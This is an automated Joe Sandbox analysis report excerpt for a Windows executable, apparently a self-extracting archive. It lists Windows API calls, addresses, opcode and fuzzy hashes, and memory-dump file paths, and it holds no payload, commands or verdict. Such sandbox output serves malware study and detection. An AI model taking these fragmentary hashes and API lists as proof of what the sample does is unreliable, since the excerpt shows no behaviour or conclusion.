                                                                                                                        • Opcode Fuzzy Hash: 01b9f0e9c32cedf92d5b57a6cbfa7160d9748def70f21d38908451b84c14ff62
                                                                                                                        • Instruction Fuzzy Hash: 4F01F7726001096FDB14DE29DC09BEE7BAAAFC9328F0DC121ED19EB250D634E9068680
                                                                                                                        APIs
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00EAF844
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00EAF910
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EAF930
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00EAF93A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 254469556-0
                                                                                                                        • Opcode ID: 7815b587d24b92e9b62028bbadd6739c6303fa25d2ca83febb1889ba4bb8e9d0
                                                                                                                        • Instruction ID: ba344ba809039446df7c8b9a07e369a89175c9c8a2606ba318f03f8d627dd04a
                                                                                                                        • Opcode Fuzzy Hash: 7815b587d24b92e9b62028bbadd6739c6303fa25d2ca83febb1889ba4bb8e9d0
                                                                                                                        • Instruction Fuzzy Hash: BE312B75D052199FDF10DFA5D989BCDBBF8AF09305F1040AAE40CAB250EB719B898F44
                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00EB8FB5
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00EB8FBF
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00EB8FCC
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3906539128-0
                                                                                                                        • Opcode ID: 275fb83821d7a4d4e52f5816b5b020b3fe1f0eea26b5dbbc6a0b4e6d7d3e073b
                                                                                                                        • Instruction ID: 1db415a9e62b2db26ad1ea3f568f4e658e95d8572cadd68156dec9efea5b5b08
                                                                                                                        • Opcode Fuzzy Hash: 275fb83821d7a4d4e52f5816b5b020b3fe1f0eea26b5dbbc6a0b4e6d7d3e073b
                                                                                                                        • Instruction Fuzzy Hash: A731D37490122CABCB21DF65DD88BDDBBB8AF08311F5052EAE41CA6350EB309F858F44
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                        • Instruction ID: 648a9535565420abd29598b0b793d8ca998fc02fc15e6ba39961e91c15d49a63
                                                                                                                        • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                        • Instruction Fuzzy Hash: AA023C71E052199BDF18CFA9D8806EEBBF1EF48314F25816AD819F7284E730A9418B80
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00EAAF35
                                                                                                                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,00ECE72C,?,?), ref: 00EAAF84
                                                                                                                        Similarity
                                                                                                                        • API ID: FormatInfoLocaleNumber
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2169056816-0
                                                                                                                        • Opcode ID: 27d236f1d4a14e90b31312f682f84f1eb98c7b2ba37213db701527b8ddb38c05
                                                                                                                        • Instruction ID: 3e93bb71db43823289add0623848cbbfe4f7f33d59e24f9ef8d1298a81a65ab5
                                                                                                                        • Opcode Fuzzy Hash: 27d236f1d4a14e90b31312f682f84f1eb98c7b2ba37213db701527b8ddb38c05
                                                                                                                        • Instruction Fuzzy Hash: 13015E3A140348AED7109F75DC45F9A77B8EF49710F209422FA05FB250E371A929CBA5
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00E96DDF,00000000,00000400), ref: 00E96C74
                                                                                                                        • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00E96C95
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3479602957-0
                                                                                                                        • Opcode ID: 2f47c1c5be14464c758cc94ae19aa5479c0c0745e081b02a3ae5cbab57a7126f
                                                                                                                        • Instruction ID: e75d945145baa2cd7cbd934d8ab3c5b537feedbb341b4dc115959e7b34f12a8b
                                                                                                                        • Opcode Fuzzy Hash: 2f47c1c5be14464c758cc94ae19aa5479c0c0745e081b02a3ae5cbab57a7126f
                                                                                                                        • Instruction Fuzzy Hash: BAD0C932344300BFFE110B728D07F6ABB9ABF45B51F18D415B7A5F80E0CA759429A629
                                                                                                                        APIs
                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00EC19EF,?,?,00000008,?,?,00EC168F,00000000), ref: 00EC1C21
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3997070919-0
                                                                                                                        • Opcode ID: 303c61e333b66e26338054f80e62e96201a6eb8e14643609377e1e9957e5fbcc
                                                                                                                        • Instruction ID: 92475b75b362a01f7687713c86cc96ae663bc8bdc4e1c1ae9da3bf42990b943e
                                                                                                                        • Opcode Fuzzy Hash: 303c61e333b66e26338054f80e62e96201a6eb8e14643609377e1e9957e5fbcc
                                                                                                                        • Instruction Fuzzy Hash: 71B11C31110609DFD719CF28C586FA57BA0FF46368F25969CE899DF2A2C336D992CB40
                                                                                                                        APIs
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00EAF66A
                                                                                                                        Similarity
                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2325560087-0
                                                                                                                        • Opcode ID: e65e0a7d14dba7479c0c0963f269426e2188952ab3b2e70582737a09d9e92492
                                                                                                                        • Instruction ID: adcefa2e7be714e995f57931459404dcb6679851e767843966020dfa5bb14544
                                                                                                                        • Opcode Fuzzy Hash: e65e0a7d14dba7479c0c0963f269426e2188952ab3b2e70582737a09d9e92492
                                                                                                                        • Instruction Fuzzy Hash: AC519F71910619CFDB28CF95E8857AAB7F0FB89308F24947AE411FB350D376A905CB50
                                                                                                                        APIs
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00E9B16B
                                                                                                                        Similarity
                                                                                                                        • API ID: Version
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1889659487-0
                                                                                                                        • Opcode ID: 6a5944598a1c9f9b741cb75120cee78fc15eeaa60b57c0d36fe08bbbd2e49e62
                                                                                                                        • Instruction ID: 5054a799452d5f2fb9942a5fafcbf7e4211639bcf11494969573f91b3d0dd8a9
                                                                                                                        • Opcode Fuzzy Hash: 6a5944598a1c9f9b741cb75120cee78fc15eeaa60b57c0d36fe08bbbd2e49e62
                                                                                                                        • Instruction Fuzzy Hash: 60F030B4E012089FDB18DB1AFD92AD573F1F748315F1042A6D515B3390C370AD89CE60
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: gj
                                                                                                                        • API String ID: 0-4203073231
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00EAF3A5), ref: 00EAF9DA
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 54951025-0
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dfec249b7f7b69ca7624ca487da260e34fd769cb51e6d3f7cbe58714f6c224b9
                                                                                                                        • Instruction ID: 3c3a983644299b44dc22ae52192cba0660d05f8e977302322830f395241b92de
                                                                                                                        • Opcode Fuzzy Hash: dfec249b7f7b69ca7624ca487da260e34fd769cb51e6d3f7cbe58714f6c224b9
                                                                                                                        • Instruction Fuzzy Hash: DAE129755093948FC304CF59E89046ABBF1EF9A300F46095FF9D4A7392C236E919DB92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                        • Instruction ID: f91f56b8d212730bdd5af99b958c8010388d2095cd3810ba23a37dcc98743201
                                                                                                                        • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                        • Instruction Fuzzy Hash: 4D9178F02003458BDB28EE64D894BFA77C5EFEA304F10192DF596AB2C2DAA4B545C352
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                        • Instruction ID: e44ad4cb16132b5442f1bfb0e6bbb95b5d6a51eb1f42e59e346580bd625e0ec2
                                                                                                                        • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                        • Instruction Fuzzy Hash: B3814AF17043454BDB34DE68C885BBD37D1EBDA308F04193DE996AF2C2DAB0A9858752
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8ce8eb9efa21253b448dffa134721f4f86c0e960f10f644c60c44ce0996493a2
                                                                                                                        • Instruction ID: 7c3a8fb5ba97b3792cae4cfd25f5eefc2f36124ce6d7e9e9acb25c235954d5b0
                                                                                                                        • Opcode Fuzzy Hash: 8ce8eb9efa21253b448dffa134721f4f86c0e960f10f644c60c44ce0996493a2
                                                                                                                        • Instruction Fuzzy Hash: 9C618933600F085ADA389A68A8957FF63E4EF51748F14392AE583FF3A1D292DD428651
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                        • Instruction ID: 9052712615570abb58130f08146d463bf72a06bb140925a56bc31425c5039f95
                                                                                                                        • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                        • Instruction Fuzzy Hash: C05146A3304F4557DF396A6C9596BFF23D99B02308F183819E982FB2C3C615ED058391
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a19ed88ad2b5eac6836983479a0da1335db3e8046a98f39ed76fa66afe8a0ec2
                                                                                                                        • Instruction ID: 41d074301c038c287f3112418fc82ea84c7d7b1f2c4746c1733ddd9e59d13887
                                                                                                                        • Opcode Fuzzy Hash: a19ed88ad2b5eac6836983479a0da1335db3e8046a98f39ed76fa66afe8a0ec2
                                                                                                                        • Instruction Fuzzy Hash: A051E8315093D58FCB11CF35C54046EBFE4AF9A318F5919AEE4D9AB243C231DA4ACB92
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0e24977e78387be144b3fd9f8ae55d01540392d8d9e45f055e62e9de2f53e570
                                                                                                                        • Instruction ID: 2cd7c097e7f8d9279652e9aafb1be90b71e8058234d034716ffdc2a35f440418
                                                                                                                        • Opcode Fuzzy Hash: 0e24977e78387be144b3fd9f8ae55d01540392d8d9e45f055e62e9de2f53e570
                                                                                                                        • Instruction Fuzzy Hash: F651EFB1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E7340D735EA59CB9A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                        • Instruction ID: 24f11cdd7e31e2767b799370de07f75e9627bf3e9aded393362f37036fbad521
                                                                                                                        • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                        • Instruction Fuzzy Hash: 4331C6B1A147468FCB28DF28C8511AABBE0FB9A304F14552DE495EB341C735EA0ACB91
                                                                                                                        APIs
                                                                                                                        • _swprintf.LIBCMT ref: 00E9E30E
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                          • Part of subcall function 00EA1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00ED1030,00000200,00E9D928,00000000,?,00000050,00ED1030), ref: 00EA1DC4
                                                                                                                        • _strlen.LIBCMT ref: 00E9E32F
                                                                                                                        • SetDlgItemTextW.USER32(?,00ECE274,?), ref: 00E9E38F
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E9E3C9
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00E9E3D5
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00E9E475
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E9E4A2
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00E9E4DB
                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00E9E4E3
                                                                                                                        • GetWindow.USER32(?,00000005), ref: 00E9E4EE
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00E9E51B
                                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 00E9E58D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                        • String ID: $%s:$CAPTION$d$t
                                                                                                                        • API String ID: 2407758923-369353836
                                                                                                                        • Opcode ID: 6f71ab7d2c8119c6ce7e1c9a6f7c07caa8fad9244023148784ffb20cf1d0f872
                                                                                                                        • Instruction ID: 845a82636b245baeb14e8939dc04939e0fcb63b383bb6bc7a0b75f713a0e84c1
                                                                                                                        • Opcode Fuzzy Hash: 6f71ab7d2c8119c6ce7e1c9a6f7c07caa8fad9244023148784ffb20cf1d0f872
                                                                                                                        • Instruction Fuzzy Hash: E3819F72208301AFD710DFA9CD89E6BBBE9EBC9704F04591DFA84B7250D671E909CB52
                                                                                                                        APIs
                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 00EBCB66
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC71E
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC730
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC742
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC754
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC766
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC778
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC78A
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC79C
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC7AE
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC7C0
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC7D2
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC7E4
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC7F6
                                                                                                                        • _free.LIBCMT ref: 00EBCB5B
                                                                                                                          • Part of subcall function 00EB8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?), ref: 00EB8DE2
                                                                                                                          • Part of subcall function 00EB8DCC: GetLastError.KERNEL32(?,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?,?), ref: 00EB8DF4
                                                                                                                        • _free.LIBCMT ref: 00EBCB7D
                                                                                                                        • _free.LIBCMT ref: 00EBCB92
                                                                                                                        • _free.LIBCMT ref: 00EBCB9D
                                                                                                                        • _free.LIBCMT ref: 00EBCBBF
                                                                                                                        • _free.LIBCMT ref: 00EBCBD2
                                                                                                                        • _free.LIBCMT ref: 00EBCBE0
                                                                                                                        • _free.LIBCMT ref: 00EBCBEB
                                                                                                                        • _free.LIBCMT ref: 00EBCC23
                                                                                                                        • _free.LIBCMT ref: 00EBCC2A
                                                                                                                        • _free.LIBCMT ref: 00EBCC47
                                                                                                                        • _free.LIBCMT ref: 00EBCC5F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                        • String ID: h
                                                                                                                        • API String ID: 161543041-3415971826
                                                                                                                        • Opcode ID: ae7339483e5d4ef60ead31a5839df4ff75e5943df7acdae0f1ed246a8be29343
                                                                                                                        • Instruction ID: 04f856743ceef7b3f43f892d2cdf0abf64a51b5b0d10cfc1192d4500e72df615
                                                                                                                        • Opcode Fuzzy Hash: ae7339483e5d4ef60ead31a5839df4ff75e5943df7acdae0f1ed246a8be29343
                                                                                                                        • Instruction Fuzzy Hash: 85314F315082059FEB21AA38D946BDBB7EDEF50314F60781AE148F6291DF31AC40CF10
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00EB9705
                                                                                                                          • Part of subcall function 00EB8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?), ref: 00EB8DE2
                                                                                                                          • Part of subcall function 00EB8DCC: GetLastError.KERNEL32(?,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?,?), ref: 00EB8DF4
                                                                                                                        • _free.LIBCMT ref: 00EB9711
                                                                                                                        • _free.LIBCMT ref: 00EB971C
                                                                                                                        • _free.LIBCMT ref: 00EB9727
                                                                                                                        • _free.LIBCMT ref: 00EB9732
                                                                                                                        • _free.LIBCMT ref: 00EB973D
                                                                                                                        • _free.LIBCMT ref: 00EB9748
                                                                                                                        • _free.LIBCMT ref: 00EB9753
                                                                                                                        • _free.LIBCMT ref: 00EB975E
                                                                                                                        • _free.LIBCMT ref: 00EB976C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
